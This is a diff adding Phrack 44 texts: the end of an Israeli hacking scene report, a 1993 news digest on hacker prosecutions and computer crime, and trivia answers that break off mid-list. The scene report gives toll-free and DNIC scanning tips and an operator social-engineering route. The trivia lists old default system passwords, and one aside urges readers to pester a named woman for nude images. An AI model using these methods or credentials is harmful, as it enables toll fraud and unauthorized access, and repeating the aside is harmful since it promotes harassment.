+bell?), although not always that lax.
+
+Last but not least are the elytee -- the computer literate public.
+These are most of the people in charge of machines on the *.il domain on
+the Internet.  Security there is better than usual, with (for example)
+"correct password" rules being observed, but (another example) with holes
+like /usr/lib/expreserve on SunOS still open.  For this reason, there is a
+difference between hackers in Israel.  There are university students who
+play around with the Internet, hack, and are usually not aware that
+there is a bigger hacking community beyond IRC.  Then, there are the
+modemers, who use modems and all the other things, but are generally not
+as proficient, since Internet access in Israel is given only to
+university people and employees of the very few companies who have
+Internet connections.  (The notion of public access Unix exists, but
+access costs $50 a month and to get it one must have approval of the
+ministry of communication because of an old law; and since calling up a
+system and running by all the defaults usually does not work, not
+everyone has access to the Internet.)
+
+Calling card abuse is very popular in Israel, because Bezeq cannot find
+abusers and really doesn't care.  Therefore there are a lot of pirates
+in Israel who are in very good touch with American pirate groups, and
+this includes the works - crackers, artist, couriers.  If you know a bit
+about the pirate community, good for you.
+
+Hackers as in computer hackers are a little rarer.  To become a hacker you
+need to pass some grueling tests.  First, you resist the lures of becoming a
+calling card and download junkie.  Then, you have to become proficient
+from nothing.  Finally most of the Israeli hacking community
+hacks for the single reason that goes something like "get into QSD",
+"get into IRC" (without paying).  Not very idealistic, but it works...
+
+Assuming you passed all these stages, let's say you are 18... and you go
+to 3 years in the army.  Did I forget to mention that serving in the
+army is mandatory in Israel?  Not really relevant, but that's life in
+Israel, and when you leave the army, you usually forget about hacking.
+
+Up until now I was just explaining things.  Now..
+
+THE PARTICULARS
+***************
+
+I will concentrate on the "modemers" in this section, so first about the
+students.  You may know this, but there is a lot of "bad" Internet
+traffic on *.il, in the form of pirate/virus FTPs and stuff like that.
+If you read Usenet, you probably saw at some time a wise ass post such a
+site.  These are usually the works of students.  To be honest, that's as
+much as I know, since I'm not a student and my stupidity is not so high
+as to assume every Internet user from *.il is a student...
+
+The "serious" modemers hackers don't really hang out in big groups.
+They have close friends or work alone, so there is nothing like Israeli
+######Cons.  I can't make an estimate of the actual amount of hacking
+done in Israel, but I do know that a lot of people got drafted lately.
+Other than that, there are a lot of Israelis hanging around on IRC (if
+you're into that), but they usually work like k0D3 k0ll3kt0rZ, only
+instead of codes they collect Unix account.
+
+In a country that has fewer people than NYC, the total number of
+people who actually have modems and do hack AND know what they're doing
+is not so large, which is why until now my description didn't sound very
+pretty.  But considering these facts, they're actually not bad.
+
+There are some "underground" groups in Israel.  Not exactly groups as
+magazines -- if there is one thing Israel is full of it's local
+magazines.  These are usually small releases featuring things like "FTP
+Tutorial" and "Pascal Trojan" along with several oh-so-accurate anarchy
+files.  The most prominent, and in the fact the only magazine to have
+lasted beyond one issue is called IRA (International Raging Anarchists).
+
+For the sake of the pirates, an Israeli formed group that also has
+American members is called HaSP; it usually releases cracks for all
+kinds of software.
+
+THE NETWORK
+***********
+
+Some time ago there was an attempt to bring up a hacking network in
+Israel.  It was called the IHPG (Israeli Hack Phreak Group) and was
+a bunch of FidoNet-style echos passed between underground boards.  The
+subjects on hand were hacking, phreaking, trojans, and viruses.  At first
+there was a genuine attempt to make things happen, but almost no one shared
+information (more accurately, accounts/passwords/codes) and the net
+slowly died out.  To my information it is still operational on around 3
+boards around Israel, with something like 3 posts per month.
+
+LAW AND ORDER
+*************
+
+The law and the establishment in Israel are divided.  For starters,
+there is the wide public opinion among the public that every hacker, in
+particular those who get caught are computer geniuses.  Therefore, in a
+lot of cases where hackers (usually university students) get caught, they
+are given a better position within the computer staff, or are later hired
+by a company (no matter what for -- and it's not always security).
+Although police and Bezeq do preach that hacking is a crime etc, I seriously
+doubt that there will be such an outrage among computer people if someone
+was to go on and build an Israeli ComSec (as an example).
+
+Police has a very limited staff assigned to computer investigations,
+(along the lines of 1-2 officers), and they are in charge of everything;
+this means they should check calling carders, but also on bank
+embezzlers who keep information on "secure" floppies.  Guess which cases
+get priority?  Of course, there is still the phone company and when
+things get more serious more man force is issued.
+
+>From time to time, however, there are arrests (see PWN on Phrack 35,
+38 elsewhere).  These usually involve (in the case of the guy described on
+Phrack 35) a tip from police overseas, who kept bugging the Israeli
+police until they made a move, or idiots who sell things.  The guy in
+the Phrack 35 World News, Deri Schreibman, was arrested after he
+supplied credit cards to people in the U.S. and Canada, who turned him
+in when they got caught.  He himself turned in a lot of people, but his
+information "just" led to them being visited.  Nothing much has been
+heard about that since, but his case got a lot of publicity because he
+had a lot of computer equipment, including this/that-boxes, and was
+said to have broken in Washington Post and the Pentagon.  After him,
+there have been raids on hackers but nothing serious happened to them,
+and the news coverage was not incredible.  A year or so ago one total asshole
+went on a national show (nothing like Geraldo) and told everyone how he too,
+abused Isranet and the Washington Post; he also claimed that Bezeq
+didn't have a clue and that was why he wasn't afraid.   He was visited and
+his equipment was taken.  At much earlier times there was a teenager who
+changed an article on the last page on an Israeli newspaper to say that his
+math teacher had been arrested for drug dealing; he got to write a computer
+program to aid blind and deaf people.  That is the general way busts go on
+in Israel, because there is no such great danger as to even warrant dreams
+of something like Sundevil.  There are also sometimes problems in the army,
+but they are dealt with internally, by the army (I don't think anyone
+gets shot though).
+
+When a bust occurred, usually many people quit fooling around with
+Isranet for a while, because all those who did get caught were doing the
+same things with Isranet.  But except for that, there were no great
+waves in the pond after busts, except again for the Deri S. case.  This
+is due simply to the fact that hackers, in Israel and usually anywhere
+else, simply don't amount to the amount of problems "professional"
+criminals make to the police, (the same way Israeli software houses chase
+down pirating firms and not boards), and since Israel doesn't have an
+FBI and/or USSS the law isn't going around pointing guns at hackers.
+
+HACKING IN ISRAEL
+*****************
+
+Hacking or phreaking in Israel in not very sophisticated.  The average
+Israeli can scan all he likes; Israeli toll free numbers in the format of
+177+Country Code+XXXX exist to almost every country.  This means that by
+dialing 177 (= 1-800), a country code (440 for the UK, 100 for AT&T, 150
+for MCI, etc), and a number on the XXXX format, you have a chance of
+connecting to a number in country whose country code you're using.
+Voice mail systems, modems and other things can be found there
+(h00ray!).
+
+There are also calling cards and X.25 and 056 (= 1-900) scams, etc, etc.
+
+A nice way to start scanning (if anyone is interested) the 4251 DNIC is
+based on area codes (yes, just like Telenet).  For example, a lot of
+systems in the 04 area code will be somewhere at: 4251 400 ...  This
+might lead to disappointing results, though, since most systems use Hebrew
+(most interesting systems).  The best way to get Israeli area codes is by
+using a file on international country/area codes put out a while ago...
+Funny, but it's more accurate than a C&P phone book.
+
+If you're into social engineering foreigners, give 1 800 477-5664 (AT&T)
+or 1 800 477-2354 (MCI) a call.  These will get you to an Israeli
+operator who will be happy to place a call for you, if you're into
+experimenting (another one of Bezeq's new services, called
+Israel*Direct... also available from the UK, Ireland, Germany and more.)
+
+CONCLUSION
+**********
+
+I hope you have learned about the Israeli scene.  My purpose was NOT to
+dis anything, it was to show that even though we live in this
+global village of networks and electronic data exchange (ohh), living in
+outer butt-fuck (I did not invent this term) has its advantages, in the
+form of basic stupidity, and its disadvantages in the form of lack of
+technology and organization in the community.  Yeah.
+
+There are still many nice things about hacking in Israel.  Enjoy your life.
diff --git a/phrack44/27.txt b/phrack44/27.txt
new file mode 100644
index 0000000..3ea16ec
--- /dev/null
+++ b/phrack44/27.txt
@@ -0,0 +1,436 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 27 of 27
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Feds Pull The Plug On Phiber Optik                             November 4, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Joshua Quitner (Newsday) (Page 57)
+
+The biggest case of computer intrusion in US history drew to a close yesterday
+when a young Elmhurst, Queens, man was sentenced to a year and a day in jail
+for his part in an electronic gang that, for years, roamed the nation's
+largest telephone and data networks.
+
+Mark Abene, 21, renowned in the digital underground as Phiber Optik, was the
+last of five young New York City men to plead guilty in federal court to one
+felony count of conspiracy for being in a hacker group known as MOD.
+
+Abene apologized for his deeds yesterday.  "I'm just sorry they were
+misconstrued as malicious in any way," he said in Manhattan's federal
+district court.
+
+Prosecutors claimed that the young men rumbled on computer networks,
+disconnecting other hackers' phone service and posting embarrassing
+information culled from confidential credit networks like TRW on
+underground bulletin boards.  They also used their power skills to get
+telephone numbers or credit reports for celebrities, including Julia
+Roberts, John Gotti, Geraldo Rivera, Christina Applegate and Mad Magazine
+founder William Gaines.
+
+John Lee, 22, a co-defendant is now serving a one year sentence in a
+"shock incarceration" boot camp in Lewisburg, PA.  Lee and Julio Fernandez,
+18, were the only gang members who made money from the two years of
+break-ins.
+
+In addition to Lee and Fernandez, Paul Stira, 23, of Cambria Heights,
+Queens, and Elias Ladopoulos, 24, of Jamaica, Queens, are serving six-month
+sentences in federal prisons in Pennsylvania.  Fernandez has been cooperating
+with authorities and is not expected to be jailed.
+
+-------------------------------------------------------------------------------
+
+Computer Caper Is Unpluged
+~~~~~~~~~~~~~~~~~~~~~~~~~~                                      October 1, 1993
+by Tim Bryant (St. Louis Dispatch) (Page A1)
+
+Investigators said 18-year-old computer hacker Paul J. Gray of Creve Coeur,
+MO, was arrested on a state charge of tampering with computer data, a
+misdemeanor.  The college freshman reportedly used his home computer to
+spy electronically on files of a federal appeals court and charge
+long-distance telephone calls to Mercantile Bank
+
+-------------------------------------------------------------------------------
+
+Teen Hacker Admits Having Illegal Credit Information              June 17, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by James McClear (Detroit News) (Page B7)
+
+Ander Monson, 18, of Houghton, MI, whose electronic misadventures uploaded
+him into the high-tech world of computer fraud, pleaded guilty in Oakland
+County Probate Court to illegal possession of credit card information.
+
+-------------------------------------------------------------------------------
+
+In The Jungle Of MUD                                         September 13, 1993
+~~~~~~~~~~~~~~~~~~~~
+by Ellen Germain (Time) (Page 61)
+
+Virtual worlds you can hook into--and get hooked on--are the latest
+rage on the computer networks.
+
+[Ah, yes, Virtual Reality as perceived through the minds of the computer
+illiterate.  But wait, it's electronic crack!  Keep an eye out for your
+children!]
+
+-------------------------------------------------------------------------------
+
+NCIC Abuse - Is Legislation The Answer                            October, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Brian Miller
+
+Confidential information is being illegally released from the National
+Crime Information Center network.  But abuse of the system is difficult
+to detect, and those caught are seldom punished.
+
+A former law enforcement officer tracked town his ex-girlfriend with
+information from an FBI-run law enforcement information system.  Then
+he killed her.
+
+A terminal operator in Pennsylvania used the same system to conduct
+background searches for her drug dealing boyfriend to see if his customers
+were undercover agents.
+
+It is hard to trace abuse to a single user because many agencies don't
+require personal access codes which would keep track of who made specific
+inquiries on the system and when they occurred.  The General Accounting
+Office polled all the states and found that 17 don't require a personal
+code to access the NCIC.  Most of these had an identifier only for the
+terminal or agency accessing the system.
+
+And if someone is caught abusing the system, they are seldom charged with
+a crime.  The GAO found that the most common penalty was a reprimand, with
+some suspensions and firings.  Of the 56 cases of abuse found by the GAO,
+only seven people were prosecuted.
+
+The FBI cannot force the states to adopt certain security measures
+because compliance with the guidelines is voluntary.  The reason for this is
+that the guts of the NCIC come from the states, and the FBI simply
+maintains the network.
+
+"The main thing that can be done today is to enforce the law, and create
+stronger penalties for abusing the system," said Marc Rotenbertg of
+Computer Professionals for Social Responsibility, an advocacy group
+based in Palo Alto, California.
+
+-------------------------------------------------------------------------------
+
+Live Wires                                                    September 6, 1993
+~~~~~~~~~~
+by Barbara Kantrowitz et.al. (Time) (Page 63)
+&
+Technoid Circus
+~~~~~~~~~~~~~~~
+by Rex Weiner (Spin) (Page 72)                                  September, 1993
+
+[K-K00l cYbUR P|_|n|< aRt1Cl3zzzz
+
+ Jump On The Cyber Bandwagon!
+
+ More Journalists ride that old info highway straight to HELL!]
+
+
+** BUT WAIT!  A "Cyber" article we can all dig! **
+
+Speciale Cyber                                                  Settembre, 1993
+~~~~~~~~~~~~~~
+di Sergio Stingo (King) (P. 131)
+
+Il cyberpunk:  tutti ne parlano, ma pochi sanno cosa sia veramente.  Libri
+elettronici?  Scenari inquietanti del futuro prossimo venturo?  Conferenze
+telematiche?  Nuovi tipi di abbigliamento usa-e-getta?  La piu' grande
+rivoluzione democratica dei nostri anni?  Una rivoluzione strisciante e
+silenziosa?  Ia nostro stingo, sempre curioso del <<nuovo>>, S'e' messo
+a girare l'italia per iundagare il fenomeno.  E' stato come scoperchiare
+una pentola in ebollizione.  Piu' incontrava <<cyber>> e piu' scopriva che
+c'era da scoprire.  Dal teorico della <<brain machine>>, che sperimenta
+l'oggetto misterioso tra discoteche e universita', alla prima galleria
+dove sono esposte opere di hacker art.  Dalle riviste-bandiera del cyber,
+come <<decoder>>, alle band che stanno inventando una nuova musica.  Per non
+parlare del sesso, che grazie alla tecnologia cerca di ampliare la
+gamma delle sensazioni possibili.  Insomma, il viaggio oltre i confini di
+questo mondo e' stato talmente ricco e avventuroso, che abbiamo dovuto
+suddividere il reportage in due puntate.  In questo numero presentiamo
+la prima.  E, come si dice tra cybernauti, buona navigazione.
+
+[I don't know what that says, but its in another language, so it has to
+ be cooler than the American CyberCrap]
+
+-------------------------------------------------------------------------------
+
+Security Products Abound, But Is Toll Fraud Too Tough?          August 30, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Dan O'Shea (Telephony) (Page 7)
+
+Telecommunications toll fraud is an increasingly popular crime that
+collectively costs its victims billions of dollars each year.  Although
+carriers have responded with a wave of security products and services,
+the problem might be much bigger than was once thought.
+
+Some carriers claim that industry wide toll fraud losses amount to between
+$2 billion and $5 billion a year, but the true figure is closer to $8 billion,
+according to Bernie Milligan, president of CTF Specialists Inc.,
+a consulting group that studies toll fraud and markets security services to
+large corporate telecommunications users.  [ed: remember HoHo Con?  Yes...THAT
+Bernie]
+
+Toll fraud involving calls coming into AT&T's 800 network dropped 75% since
+the introduction of NetProtect, while Sprint estimates a 95% decrease from
+last year (since the introduction of their fraud detection service).  Average
+losses across the industry have plummeted from $120,000 per incident to
+$45,000.
+
+Despite the offensive against telecom fraud, the problem persists and is
+becoming more frequent, and new technologies will only represent potential
+new adventures for hackers, CFT's Milligan said.  Hacker activity is growing
+at an annual rate of 35%.  Some 65% to 80% of toll fraud involves
+international calling, and fraud occurs on a much wider scale than just
+inbound 800 calls, Milligan said.  So, while losses of this type of fraud
+drop, collective fraud losses are increasing by 25% each year.  Customers
+are still liable financially in toll fraud cases, and the carriers continue
+to get paid.
+
+-------------------------------------------------------------------------------
+
+Misfit Millionaires                                              December, 1993
+~~~~~~~~~~~~~~~~~~~
+by Steve Fishman (Details) (Page 158)
+
+[Author profiles several of the early Microsoft programmers, namely
+ Richard Brodie, Jabe Blumenthal, Kevin DeGraaf, Neil Konzen and Doug
+  Klunder]
+
+-------------------------------------------------------------------------------
+
+Intercourse With Lisa Palac                                                1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Melissa Plotsky (Axcess) (Page 62)
+&
+Turned On By Technology In The World Of Cybersex                August 30, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Marco R. della Cava (USA Today) (Page 4D)
+
+[An interview and an overview dealing with online nastiness.  Lisa Palac
+ editor of Future Sex and producer of Cyborgasm talks about all kinds of
+ stuff.  As a regular peruser of Future Sex (for the articles of course)
+ I can't help but wonder why we haven't seen HER naked yet.  Email
+ her at futursex@well.sf.ca.us and demand some gifs.]
+
+-------------------------------------------------------------------------------
+
+Don't Try This At Home
+~~~~~~~~~~~~~~~~~~~~~~                                             August, 1993
+(Compute) (Page 62)
+
+Welcome to desktop forgery.
+
+Susan Morton, senior forensic document examiner with the US Postal Service
+in San Francisco, has seen gangs travelling the country packing computers,
+scanners, and laser printers.  Arriving in town, their first move is to rob
+a mailbox to acquire some checks that were mailed to, say, a local utility
+company.  They will copy the account and routing code off some citizen's
+check and decide what branch bank that person probably uses.  Then they forge
+a large corporate or government check to that person, using information from
+other checks they found in the mail.  Packing a forged ID, a gang member
+will then go to a branch across town where presumably nobody knows the
+citizen and deposit part of that forged check.  The check may be for $5000,
+of which the forger takes $2000 as cash, smiles and leaves.
+
+One check forging gang was chased across Texas for about six months in the
+late 1980s, recalls Robert Ansley, corporate security manager for Dell
+Computer in Austin, Texas, then with the Austin police department.  Armed
+with a stolen Macintosh and an ID maker stolen from a highway patrol
+substation, they passed more than $100,000 in bogus checks in Austin alone.
+
+Sources say other gangs have used laser printers to forge security ID
+badges to get into office buildings and steal the computers, nodding at the
+friendly security guard at the front desk while trudging out with their
+arms full.
+
+"We have been urging corporations to move forward with EDI (Electronic
+Data Interchange) for more and more of their business transactions and
+avoid paper, since it will become so vulnerable," says Donn Parker,
+computer crime expert with SRI International in Menlo Park, California.
+
+In 1991, the Secret Service busted 66 traditional counterfeiting operations,
+while seizing 52 office machines that had been used for counterfeiting
+
+-------------------------------------------------------------------------------
+
+Subduing Software Pirates                                         October, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~
+by Suzanne Weisband and Seymour Goodman (Technology Review) (Page 30)
+
+[The software manufacturers claim they lose between 9 and 12 billion
+annually.  Thank GOD for the SPA and the BSA.  Like they are go to
+Singapore or Hong Kong with guns and get the REAL culprits.  Noooo.
+Let's raid BBSes and businesses.
+
+Their people at COMDEX told me they really weren't interested in
+taking my money to help me combat Phrack Piracy.  I think we all know
+where THEIR interests lie.]
+
+-------------------------------------------------------------------------------
+
+Mindvox: Urban Attitude Online                                   November, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Charles Platt (Wired) (Page 56)
+
+[Another of those cute Mindvox RULES articles.  "Fancher looked too neat,
+clean, and classy to be a hacker, but he enjoyed the cut-and-thrust of
+online jousting as much as anyone."  But wait, there's a little
+name dropping too:  Wil Wheaton, Kurt Larson, Billy Idol, THE LEGION OF DOOM!
+
+Don't get me wrong, I love Vox.  And I really like the author of this story's
+last book "The Silicon Man," I just get kinda edgy about stuff in Wired.
+
+Favorite quote:  "Unix is arcane," says Bruce, "and it's weird, and most
+users don't want to deal with it."  I know I don't.  Not.]
+-------------------------------------------------------------------------------
+
+Intel To Protect Chips                                         October 22, 1993
+~~~~~~~~~~~~~~~~~~~~~~
+(Newswire Sources)
+
+One of the nation's largest manufacturers of computer chips said Friday it
+will start to put serial numbers on its products in an effort to stem the
+rising tide of robberies.  Intel Corp. said it was taking its actions
+after a flurry of armed takeover robberies at warehouses in California's
+Silicon Valley over the last six months.
+
+What the robbers are after is microprocessors -- the brains that power
+personal computers. Among their favorite targets has been Intel's 486
+microprocessor.
+
+Julius Finkelstein, head of Santa Clara's High Tech Crime Task Force,
+called chip robberies "the gang crime of the 1990s."  "They are just
+as valuable as cocaine," he said. "But they are easier to get rid of
+and if you are caught the penalties aren't as severe."
+
+The gangs, Finkelstein said, are Asian, well organized and very
+knowledgable about computer components. They generally drive up to a
+warehouse door as if coming for a shipment, but once inside pull out
+their weapons and force the employees to the floor.
+
+Last month, a takeover robbery at the Wylie Laboratories Electronic
+Marketing Group in Santa Clara netted thieves an estimated $1 million in
+chips. Finkelstein said that robbery took only about 15 minutes.
+
+-------------------------------------------------------------------------------
+
+Chip Robberies Continue                                        November 5, 1993
+~~~~~~~~~~~~~~~~~~~~~~~
+(Newswire Sources)
+
+Authorities said a gang of Vietnamese-speaking bandits staged a violent
+takeover robbery of a San Jose computer parts company Thursday, wounding
+one man and escaping with an undisclosed amount of electronic equipment.
+
+Lt. Rob Davis said the robbery began at 1:01 a.m. when as many as
+five gunmen forced their way into the Top Line Electronics Co., a
+computer board manufacturer. The bandits rounded up the employees and
+beat them in an attempt to find where the computer parts were stored.
+
+One employee was shot in the hip as he tried to escape. Davis said
+the man was treated at a local hospital and was listed in stable
+condition.
+
+-------------------------------------------------------------------------------
+
+Hacker Revelled In Spotlight, Court Told                        August 23, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(The Age)
+
+A hacker who broke into a computer at NASA in the United States,
+and contemplated sending it a message not to launch a space shuttle, was
+delighted with the effect he was having, the County Court was told yesterday.
+
+The prosecutor, Mr Richard Maidment, said that in a three-way
+conversation between Nahshon Even-Chaim,  David John Woodcock
+and another computer hacker, Woodcock discussed sending a message
+to a computer at NASA to stop the launch of a space shuttle, after
+Woodcock talked about the shuttle Challenger, which blew up several
+years before, and said "I have got to do something about NASA."
+
+Even-Chaim, 22, formerly of Narong Road, Caulfield, yesterday
+pleaded guilty to 15 charges relating to unauthorized obtaining,
+altering, inserting, and erasing of data stored in a computer, and
+the interfering and obstruction of the lawful use of a computer.
+
+Woodcock, 25, formerly of Ashleigh Avenue, Frankston, pleaded
+guilty to two counts of being knowingly concerned in the obtaining
+of unauthorized access by Even-Chaim to data stored in a computer.
+
+The court was told that a co-offender, Richard Martin Jones
+was earlier sentenced to six months jail, but was released on a $500,
+six-month good behavior bond.
+
+The court was told that Even-Chaim obtained free use of telephone
+lines for many hours to connect his home computer to other systems
+in the United States.
+
+Mr. Maidment said that Even-Chaim, Woodcock, and Jones, who
+collectively called themselves "The Realm", were arrested in April 1990
+by the Australia Federal Police after an investigation that began with
+information received from the United States Secret Service.
+
+-------------------------------------------------------------------------------
+
+The Last Hacker                                              September 26, 1993
+~~~~~~~~~~~~~~~
+by Jonathan Littman (LA Times)
+
+[This is the bet article I've seen yet about Kevin Poulsen.  Please go
+ find it and read it.  It covers Poulsen from beginning to end.  All the
+ crazy stunts, the life on the run, the show down with the feds.  Everything.
+ Here is a small excerpt.]
+
+KIIS-Fm called it a "Win a Porsche by Friday": eight Porsches - about
+$400,000 worth of steel, leather and status - given away, one a week. You could
+hardly live or work in Los Angeles without being caught up in the frenzy. It
+seems that the gleaming, candy-red convertibles were plastered on nearly every
+billboard and bus in town. Listeners were glued to KIIS, hoping to make the
+102nd call after Dees spun the third song in the magical series.
+
+Housewives, businessmen, students and contest freaks jammed the lines with
+their car phones and auto-dialers. They all had hopes, but one 24-year-old high
+school dropout had a plan. America's most wanted hacker and his associates
+sat by their computers and waited. On the morning of June 1, 1990 KIIS played
+'Escapade,' 'Love Shack; and then, yes, "Kiss." "We blew out the phone lines,"
+every line was ringing says Karen Tobin, the stations promotional director. "We
+picked up the calls and counted."
+
+The hacker was counting too. At the precise moment Price's "Kiss" hit the air
+he seized control of the station's 25 phone liens, blocking out all calls but
+his own. Then the man, who identified himself as Michael B. Peters, calmly
+dialed the 102nd call and won a Porsche 944 S2.
+
+It was child's play. Especially for Kevin Lee Poulsen. Computer hacking had
+once seemed an innocent obsession to Poulsen, a native of Pasadena, but now it
+was his life, and it had taken him over the line. This October, Poulsen will
+face the first of two trials, one in San Jose and another in Los Angeles, that
+federal prosecutors say are critical to the government. Because of the
+seriousness of his alleged breaches of national security, they intend to use the
+case as an example to the hacker underground.
+
+As a teen-ager, Poulsen had burrowed deep into the giant switching networks
+of Pacific Bell, exploring and exploiting nearly every element of its powerful
+computers, from the common systems responsible for creating, changing and
+maintaining phone service to the shadow systems that guard the secrets of
+national security, according to accusations in a federal indictment. The U.S.
+attorney in San Jose says that Poulsen had wiretapped the intimate phone calls
+of a Hollywood starlet, allegedly conspired to steal classified military orders,
+and reportedly uncovered unpublished telephone numbers for the Soviet Consulate
+in San Francisco.
+
+-------------------------------------------------------------------------------
+
+ 
diff --git a/phrack44/3.txt b/phrack44/3.txt
new file mode 100644
index 0000000..788b6f2
--- /dev/null
+++ b/phrack44/3.txt
@@ -0,0 +1,1573 @@
+                         ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Four, File 3 of 27
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                PART I
+
+******************************************************************************
+
+PHRACK TRIVIA
+
+Last issue I tried something different.  I tried to have a little
+trivia contest, giving away some prizes for the first to get all
+the answers.  Well, I should have known that Phrack's readers
+are lazy.  The amount of you who actually responded was pathetic.
+
+The winners are:  dFx, Holistic, Damiano & Matt
+
+I had planned on 5 winners.  Notice how many won.  I won't even
+say how many these guys got right, because noone came close to
+100%.  Obviously I'm the only trivia buff in the underground.
+
+-------------------------------------------------------------------------------
+
+PHRACK TRIVIA ANSWERS
+
+1)      CCIS
+        Common Channel Interoffice Signalling
+
+2)      Stimpson J. Cat's Roommate is?
+        Ren Hoek
+
+3)      Name the cracker.
+        Bill Landreth
+
+4)      METAL AE password.
+        KILL
+
+5)      Who invented the TeleTrial?
+        King Blotto
+
+6)      Name Bloom County's hacker.
+        Oliver Wendell Jones
+
+7)      What was the Whiz Kids' computer named?
+        RALF
+
+8)      Western Union owned what long distance service?
+        MetroPhone
+
+9)      What computer read both Apple ][ and IBM PC disks?
+        The Franklin ACE
+
+10)     Who made the "Charlie" board?
+        John Draper
+
+11)     How many credits for a CNE?
+        19
+
+12)     What was in the trunk of the Chevy Malibu?
+        Dead Aliens
+
+13)     Name three bands A. Jourgensen had a hand in.
+        Ministry, Revolting Cocks, Skatenigs, Pailhead, Lard, (etc.)
+
+14)     SYSTEST Password:
+        UETP
+
+15)     What computer makes the best Sim Stim decks?
+        Ono-Sendai
+
+16)     What magazine brought the telephone underground to national
+        attention in 1971?
+        Esquire
+
+17)     What is the significance of 1100 + 1700 hz?
+        KP
+
+18)     What magazine was raided for publishing black box plans?
+        Ramparts
+
+19)     What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ?
+        The Private Sector
+
+20)     CLASS
+        Custom Local Area Signalling Services
+
+21)     What computer responds "OSL, Please" ?
+        NT SL-1
+
+22)     RACF secures what OS?
+        MVS
+
+23)     The first person to create a glider gun got what?
+        $50.00
+
+24)     QRM
+        Interference from another station or man-made source
+
+25)     PSS
+        Packet Switch Stream
+
+26)     What PSN was acquired by GTE Telenet?
+        UniNet
+
+27)     914-725-4060
+        OSUNY
+
+28)     April 15, 1943
+        Discovery of LSD
+
+29)     8LGM
+        8-legged Grove Machine
+
+30)     WOPR
+        War Operations Planned Response
+
+31)     What happened on March 1, 1990?
+        Steve Jackson Games Raided By Secret Service
+
+32)     Port 79
+        Finger
+
+33)     Who starred in the namesake of Neil Gorsuch's UNIX security
+        mailing list?
+        Sean Connery
+
+34)     What Dutch scientist did research in RF?
+        Van Eck
+
+35)     What was the author of GURPS Cyberpunk better known as?
+        The Mentor
+
+36)     Who would "Piss on a spark plug if he thought it would do
+        any good?"
+        General Berringer
+
+37)     What thinktank did Nickie Halflinger escape from?
+        Tarnover
+
+38)     NCSC
+        National Computer Security Center
+
+39)     Who is Pengo's favorite astronomer?
+        Cliff Stoll
+
+40)     What language was Mitnik's favorite OS written in?
+        BLISS
+
+41)     Abdul Alhazred wrote what?
+        The Necronomicon
+
+42)     The answer to it all is?
+        42
+
+43)     Who is the father of computer security?
+        Donn B. Parker
+
+44)     Who wrote VCL?
+        Nowhere Man
+
+45)     What kind of computer did Cosmo have?
+        A Cray
+
+46)     Hetfield, Ulrich, Hammet, Newstead
+        Metallica
+
+47)     What company wrote the computer game "Hacker?"
+        Activision
+
+48)     Who does Tim Foley work for?
+        US Secret Service
+
+49)     Who played Agent Cooper?
+        Kyle MacLachlan
+
+50)     Vines runs over what OS?
+        AT&T Sys V. UNIX
+
+51)     Mr. Peabody built what?
+        The Way-back Machine
+
+52)     Who makes SecurID?
+        Security Dynamics
+
+53)     What's in a Mexican Flag?
+        White Tequila, Green Creme de Menthe & Grenadine, layered
+
+54)     Who created Interzone?
+        William S. Burroughs
+
+55)     JAMs (as led by John Dillinger)
+        Justified Ancients of MU
+
+56)     Abbie Hoffman helped start what phreak magazine?
+        YIPL
+
+57)     What was once "Reality Hackers?"
+        Mondo 2000
+
+58)     Gates and Allen "wrote" BASIC for what computer?
+        The Altair
+
+59)     Tahoe is related to what OS?
+        BSD Unix
+
+60)     CPE 1704 TKS is what?
+        Launch Code from Wargames
+
+61)     Telemail's default was what?
+        A
+
+62)     "Do Androids Dream of Electric Sheep" became what?
+        Blade Runner
+
+63)     What broadcasts between roughly 40 and 50 mhz?
+        Cordless Phones
+
+64)     Who created Tangram, Stratosphere, and Phaedra among others?
+        Tangerine Dream
+
+65)     What was Flynn's most popular video game?
+        Space Paranoids
+
+66)     Who lived in Goose Island, Oregon?
+        Dr. Steven Falken
+
+67)     516-935-2481
+        Plovernet
+
+68)     What is the security of ComSecMilNavPac?
+        9
+
+69)     What has the "spiral death trap?"
+        Qix
+
+70)     Who was the Midnight Skulker?
+        Mark Bernay
+
+71)     TMRC
+        Tech Model Railroad Club
+
+72)     Who wrote "Jawbreaker?"
+        John Harris
+
+73)     213-080-1050
+        Alliance Teleconferencing, Los Angeles
+
+74)     What is the Tetragrammaton represented as?
+        YHVH (or IHVH)
+
+75)     Who is Francis J. Haynes?
+        Frank (of the Phunny Phone Call fame)
+
+76)     Who ran into one of the Akira test subjects?
+        Tetsuo Shima
+
+77)     What had "Munchies, Fireballs and Yllabian Space Guppies?"
+        Stargate
+
+78)     PARC
+        Palo Alto Research Center
+
+79)     Alex and his droogs hung out where?
+        The Korova Milk Bar
+
+80)     Jane Chandler in DC's "Hacker Files" is based on who?
+        Gail Thackeray
+
+81)     The Artificial Kid lives on what planet?
+        Reverie
+
+82)     208057040540
+        QSD
+
+83)     What are the two most common processors for cellular phones?
+        8051 & 68HC11
+
+84)     Who came up with the term "ICE?"
+        Tom Maddox
+
+85)     What group is hoped might help the "Angels" contact RMS?
+        The Legion of Doom
+
+86)     Who is Akbar's friend?
